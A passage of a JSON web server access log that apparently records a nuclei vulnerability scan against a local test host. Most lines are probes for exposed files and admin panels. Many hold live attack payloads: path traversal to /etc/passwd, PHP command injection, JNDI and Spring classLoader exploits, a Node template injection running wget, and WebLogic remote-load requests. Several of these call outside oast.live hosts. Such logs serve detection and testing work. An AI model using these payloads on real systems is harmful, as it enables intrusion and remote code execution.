"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lfm.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wlsecurity.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prtg/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD25NAy6pBIrxuw1jEfj50bdu/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRTG/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://ca28fg0smpvbd3qg07h0fb1t8ykuh8hau.oast.live/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca28fg0smpvbd3qg07h0ofg861jttbce1.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ca28fg0smpvbd3qg07h07r1r9jf3w9po1.oast.live%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ca28fg0smpvbd3qg07h06dtxjfmk4akhq.oast.live') 